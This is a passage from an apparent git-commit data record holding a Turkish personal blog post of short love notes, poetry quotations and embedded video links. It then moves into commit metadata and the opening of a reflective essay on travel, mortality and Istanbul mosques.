\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\ud83d\udc30\ud83d\udc10 \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBedenim, ruhum ve \u00f6mr\u00fcm senin ellerinde. Nas\u0131l dilersen \u00f6yle kullanabilirsin. Ben sultan\u0131m\u0131n bendesiyim. Bo\u015funa de\u011fil bilakis sevgine lay\u0131k olabilmek i\u00e7in bir f\u0131rsat.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nNe g\u00fczel bir g\u00fcnd\u00fc, \u00e7ok g\u00fczel bir an\u0131. Paha bi\u00e7ilmez bir yorgunluk. Hepsi i\u00e7in ne kadar te\u015fekk\u00fcr edeyim? G\u00fcl\u00fcmsemeni g\u00f6rme bahtiyarl\u0131\u011f\u0131na te\u015fekk\u00fcrler kafi gelmez. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nHala otob\u00fcs\u00fcn cam\u0131na bak\u0131yorum, g\u00fcl\u00fcms\u00fcyorsun. G\u00fcller a\u00e7\u0131yor g\u00fcl y\u00fcz\u00fcn. \n\n_\"Ne \u00e7\u00e2re var ki fir\u00e2kunla eglenem bir dem_ +\n_Ne t\u00e2li\u2019\u00fcm meded eyler vis\u00e2le f\u0131rsat olur\"_ +\n(Nef'\u00ee)\n\n_(Ne senin ayr\u0131l\u0131\u011f\u0131n y\u00fcz\u00fcnden bir an oturup kalman\u0131n \u00e7aresi var ne de talihim yard\u0131m eder de sana kavu\u015fma f\u0131rsat\u0131 bulabilirim.)_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBen hala otob\u00fcs\u00fcn cam\u0131n\u0131 g\u00f6zetliyorum.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYarimin kokusunu r\u00fczgar\u0131nda saklayan \u015fehir, senden o kokuyu almaya geldim. Nefes nefes havandan \u00e7ekerek... \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nSanki iki \u015fehirden ayr\u0131l\u0131yorum. \u0130ki \u00f6zlemi s\u0131\u011fd\u0131raca\u011f\u0131m y\u00fcre\u011fime. \n\nVe hi\u00e7 unutma olur mu, seni seviyorum.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\"H\u0131 h\u0131\" \ud83d\udc95 \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00fczel, ne g\u00fczel olmu\u015fsun\n\nvideo::z7BFOVzLM8M[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nVarsam Ta\u015fhan'a izini arasam, Ali Pa\u015fa'ya var\u0131p bir yol soluklansam, Behzat boyu ad\u0131mlasam, Ball\u0131ca'ya yol d\u00fc\u015f\u00fcr\u00fcp nefeslensem, \u00c7ekenli'de yolunu g\u00f6zlesem bulur muyum seni sultan\u0131m? \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eirin k\u0131z, sana iyi bir e\u015f olman\u0131n hayali -belki de umudu- beni b\u00f6ylesine din\u00e7 tutan.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00c7ok \u00f6zledim seni. \u0130nsan en yak\u0131n\u0131nda hissetti\u011finin \u00f6zlemini daha \u00e7ok duyarm\u0131\u015f.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::IC-3G7jWEbk[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nNereye gidersen mele\u011fim, avu\u00e7lar\u0131na b\u0131rakt\u0131\u011f\u0131m kalbim de seninle oraya geliyor.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Vuslat\u0131ndan g\u00f6nl\u00fcm\u00fc Allah mehc\u00fbr etmesin_ +\n_R\u00fbhumu kabzeylesin senden beni d\u00fbr etmesin\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nSen \u00fcz\u00fclme mele\u011fim. Hi\u00e7 \u00fcz\u00fclme. Seni tan\u0131makla dahi iftihar ederim ben. Seni sevmekle nas\u0131l \u00f6v\u00fcn\u00fcr\u00fcm var d\u00fc\u015f\u00fcn. Kimse yad\u0131rgamaz ay\u0131plamaz ama vars\u0131n \u00f6yle olsun, hi\u00e7 m\u00fchim de\u011fil. Seni sevmekten dolay\u0131 ay\u0131planacaksam \u00fcstad\u0131m Kays'a seslenirim: \"\u00c7ok \u015f\u00fck\u00fcr, beni de ay\u0131plad\u0131lar!\" +\n\nSen hi\u00e7 \u00fcz\u00fclme, g\u00fcl ki g\u00fcller a\u00e7s\u0131n g\u00fcl y\u00fcz\u00fcnde. Tan\u0131makla \u015feref buldu\u011fum seni \u00e7ok seviyorum. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_Sen burada, kalbimdesin_ +\n_Kalbim hep seninle atacak_\n\nvideo::zCLJU1z8Cw4[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00f6\u011fe a\u00e7\u0131lan pencerem, \u0131\u015f\u0131\u011f\u0131m, nurum. Bilirim, bu aciz sevgim sana lay\u0131k olmaya yetmez. Ne kadar \u00e7ok olsa bir o kadar az kal\u0131r. \n\nSevgisiyle beni ku\u015fatan melek, sana lay\u0131k bir e\u015f olma gayesinden geri kalmamak duas\u0131nday\u0131m. \n\nG\u00fcl\u00fcnce tomurcuklar\u0131 uyand\u0131ran g\u00fczel, y\u00fcz\u00fcnde bir g\u00fcl\u00fcmseme olmak i\u00e7in can\u0131m feda. \n\nNe dersem az demi\u015fimdir, ne demi\u015fsem sana lay\u0131k olamam\u0131\u015f\u0131md\u0131r. Hi\u00e7 de\u011filse bunu bilirim. \n\nSeni seviyorum can\u0131m\u0131n i\u00e7i. *\u0130yi ki do\u011fdun.*\n\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nAllah'\u0131m \u015f\u00fck\u00fcrler olsun. Bana O'nu tan\u0131ma f\u0131rsat\u0131 verdi\u011fin i\u00e7in, sevgisini kalbime nak\u015fetti\u011fin i\u00e7in. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBirtanem \u00e7ok \u00f6zledim seni ben\n\nvideo::vd_mkHdZIEQ[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nSeni ben y\u00fcrekten, candan seviyorum\ud83d\udc95 \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nHo\u015fuma gitti. Belki sen de be\u011fenirsin canca\u011f\u0131z\u0131m. \n\nvideo::5GfZahNlEh0[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00fczel olan O'nun be\u011fendi\u011fidir. \n\nvideo::9sIN1mlr2f8[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nCan\u0131m\u0131n i\u00e7i senin \u00fcz\u00fclmene y\u00fcre\u011fim dayanm\u0131yor ki. Hep y\u00fcz\u00fcn g\u00fclse. Sana \u00e7ok yak\u0131\u015f\u0131yor. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nHuzur bir enstr\u00fcman olsa senin sesinden ba\u015fkas\u0131n\u0131 \u00e7\u0131karamazd\u0131 mele\u011fim. \ud83d\udc95 \n\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::CVHHLh99B3Q[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nO, benim can\u0131m. Hep yan\u0131mda olsun istiyorum. Hi\u00e7 ayr\u0131 kalmamak... \n\n\u0130yi ki var.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nAtk\u0131m \u00e7ooook g\u00fczel \ud83d\ude0d \n\nAlan, sar\u0131lan g\u00fczel \u00e7\u00fcnk\u00fc. \n\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBarda\u011f\u0131ndan su i\u00e7mek, tarifsiz bir mutluluk. Te\u015fekk\u00fcr ederim mele\u011fim her an i\u00e7in.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nSenin yan\u0131nda olman\u0131n verdi\u011fi huzur ve mutluluk bir ba\u015fka. Hep senin yan\u0131nda olabilsem. Ah ke\u015fke. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_Bir tek seni sevmek \u00e7ok de\u011fil_\n\nvideo::303967019[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nGeriye d\u00f6n\u00fcp bak\u0131nca seninle ge\u00e7en her an\u0131m i\u00e7in \u015f\u00fckrediyorum. Sadece yan\u0131m(n)da oldu\u011fun(m) vakitler i\u00e7in de\u011fil. Seni \u00f6zledi\u011fim, seni d\u00fc\u015f\u00fcnd\u00fc\u011f\u00fcm, hayal kurdu\u011fum her vakit k\u0131ymetli i\u015fte. Has\u0131l\u0131, sevgin kalbime kondu konal\u0131 ge\u00e7en ne kadar zaman varsa hepsi i\u00e7in binlerce \u015f\u00fck\u00fcr.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::9XFXbSJ5Cis[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nD\u00f6n\u00fcp ge\u00e7en zamana bak\u0131yorum. Hi\u00e7bir an\u0131na ke\u015fke olmasayd\u0131 diyemem, her biri ayr\u0131 k\u0131ymetli. +\nSeni sevdi\u011fim -sana a\u015f\u0131k oldu\u011fum demek istiyor- andan bu yana ne kadar \u00e7ok g\u00fczellik ya\u015fatt\u0131n bana. +\nHepsi i\u00e7in sana m\u00fcte\u015fekkirim. Sesini duymak, g\u00fcl y\u00fcz\u00fcn\u00fc g\u00f6rmek akl\u0131mdan ge\u00e7mezdi de kendimi dolunay\u0131 beklemekle avuturdum. +\n\u015eimdi her telefonum \u00e7ald\u0131\u011f\u0131nda vakit ay\u0131n on d\u00f6rd\u00fc oluyor birden. +\nHani \u015fair \u015f\u00f6yle ba\u015fl\u0131yor \u015fiirine: +\n_Seninle bir ya\u011fmur ba\u015fl\u0131yor iplik iplik_ +\n\u0130\u015fte bu ya\u011fmur ruhumu y\u0131k\u0131yor, pak ediyor. Senin getirdi\u011fin ya\u011fmur. +\nVe \u015f\u00f6yle devam ediyor ya sonraki dizede: +\n_Bir g\u00fczellik do\u011fuyor y\u00fcre\u011fime \u015fiirden_ +\nG\u00fczelli\u011fi ruhuma ve kalbime buyur eden sensin. Bu senin eserin. +\nD\u00fc\u015f\u00fcn\u00fcyorum bazen, hayat\u0131mda ne yapt\u0131m bug\u00fcne kadar? +\nSeni sevdim, i\u015fte bu kadar\u0131 yeter. +\nBak akl\u0131ma bir \u015fiir daha geldi b\u00f6yle s\u00f6yleyince. +\n_Seni sevip \u00e7ekildim dedim d\u00fcnya bu kadar_ +\nBenim d\u00fcnyam sensin prensesim.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nSen benim \"iyi ki'msin\" +\nS\u00fcrekli \u00f6zledi\u011fimsin +\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130n\u015fallah tez vakitte hay\u0131rl\u0131s\u0131yla, in\u015fallah. +\nAmin. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBo\u015f durmas\u0131ndan daha iyi bence, ne dersin can\u0131m? \ud83d\ude00 \n\nvideo::2DPUAxvd978[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_Ben kulunum sen efendimsin benim_\n\nvideo::W0ggje8Y8Fo[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_Bir kelebeksin, gonca \u00e7iceksin_ +\n_G\u00fczel meleksin, nazl\u0131 bebeksin_\n\nvideo::1t_3ik1dx18[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nMeftunun olmu\u015fum \ud83d\udc95 \n\nvideo::7dVnGZ5mgrQ[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBu, burada dursun. Laz\u0131m olacak \ud83d\ude0d \n\nvideo::6pZwYgoL8L8[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYalvar\u0131r\u0131m, ne yapaca\u011f\u0131n\u0131 bilmeyene yol g\u00f6ster. Ya da bu yolu beraber y\u00fcr\u00fcyelim. \n\nSeni seviyorum, Mahru'dan \u00f6te sevgiyle. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nY\u00fcre\u011fimde senin h\u00fczn\u00fcn\u00fc ta\u015f\u0131mak da g\u00fczel. +\n\u0130n\u015fallah \u00e7ok s\u00fcrmez senden uzak kalmam. Nefesim kesiliyor. Sensiz de\u011ferim yok. Uzatma olur mu, d\u00f6n tekrar. Allah bize hay\u0131rl\u0131 bir yol a\u00e7ar in\u015fallah.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nA\u00e7 kalma sak\u0131n. Akl\u0131m sende. Kendine iyi bak en k\u0131ymetlim. \n\nUnutuyordum az kals\u0131n, iyi ki do\u011fdun mele\u011fim. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nU\u00e7a\u011fa bindim. 22.21\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"53444526efcbb4215e524d9a61891bd9121a55bc","subject":"Update 2017-10-02-Kisa-Kisa-2.adoc","message":"Update 2017-10-02-Kisa-Kisa-2.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-10-02-Kisa-Kisa-2.adoc","new_file":"_posts\/2017-10-02-Kisa-Kisa-2.adoc","new_contents":"= K\u0131sa K\u0131sa (2)\n:hp-tags:\n\nBir s\u00fcredir haftada bir yapt\u0131\u011f\u0131m yolculuklarda fark\u0131na vard\u0131m ki her yolculuk bana \u00f6l\u00fcm\u00fc ciddi anlamda hat\u0131rlat\u0131yor. G\u00fcnl\u00fck ya\u015fant\u0131da mezarl\u0131k duvarlar\u0131n\u0131n arkas\u0131na silkeledi\u011fim(iz) bu ger\u00e7e\u011fi hat\u0131rlamama vesile oluyor yolculuklar. Her yolculuk bunu az veya \u00e7ok bir \u015fekilde y\u00e2d\u0131ma d\u00fc\u015f\u00fcr\u00fcyormu\u015f asl\u0131nda yeni farkettim. Neden sorusu bu sezi\u015fin pe\u015fine tak\u0131ld\u0131 hemencecik. \u0130lk akl\u0131ma gelen cevap \u015fu oldu: \"\u00d6l\u00fcm de bir yolculuktur neticede. Bu k\u0131sa yolculuklar o b\u00fcy\u00fck yolculu\u011fun bir musaggaras\u0131d\u0131r.\" Bir de \u015f\u00f6yle tartt\u0131m kendimi: \"Yoksa geri d\u00f6nememek korkusu mu bu ya\u015fad\u0131\u011f\u0131n?\", \"\u00d6l\u00fcm\u00fc de geri d\u00f6n\u00fc\u015f\u00fc olmayan bir gidi\u015f olarak g\u00f6r\u00fcyorsun da D\u00fcnya'ya d\u00fc\u015fk\u00fcnl\u00fc\u011f\u00fcn m\u00fc akl\u0131na getiriyor onu?\" Terazinin iki kefesine iki d\u00fc\u015f\u00fcnceyi de b\u0131rakt\u0131m, tahterevallide oynayan \u00e7ocuklar gibi hangileri a\u015fa\u011f\u0131da hangileri yukar\u0131da g\u00f6remedim.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBu yolculuklar\u0131n bitiminde kendimi bir arkada\u015f\u0131n kuca\u011f\u0131na b\u0131rak\u0131verdim. Birka\u00e7 ayd\u0131r uzak kald\u0131\u011f\u0131m, avlusunda kedilerin ko\u015fturmacas\u0131na dald\u0131\u011f\u0131m \u00dcsk\u00fcdar Mihrimah Sultan Cami\u00ee'nden ba\u015fka bir yer de\u011fildi. Her seferinde uzaktan g\u00fcl-endam\u0131n\u0131 seyredip biraz \u00f6zlem biraz sevin\u00e7le yol al\u0131yorum ona do\u011fru. Gece en siyah \u00e7ar\u015faf\u0131 \u00f6rterken g\u00f6ky\u00fcz\u00fcne avlusuna ayak bas\u0131yorum, Valide Sultan Cami\u00ee ile s\u00f6yle\u015fmeye ba\u015fl\u0131yor iki dost. B\u00f6lm\u00fcyorum onlar\u0131, dinliyorum bir yandan \u015fad\u0131rvandan akan sular\u0131n sesi. G\u00fcne\u015f utanga\u00e7l\u0131\u011f\u0131n\u0131 k\u0131z\u0131ll\u0131klar\u0131n ard\u0131nda b\u0131rakarak g\u00f6steriyor kendini. Bir ba\u015fka dostu g\u00f6r\u00fcyorum, uzak kalman\u0131n 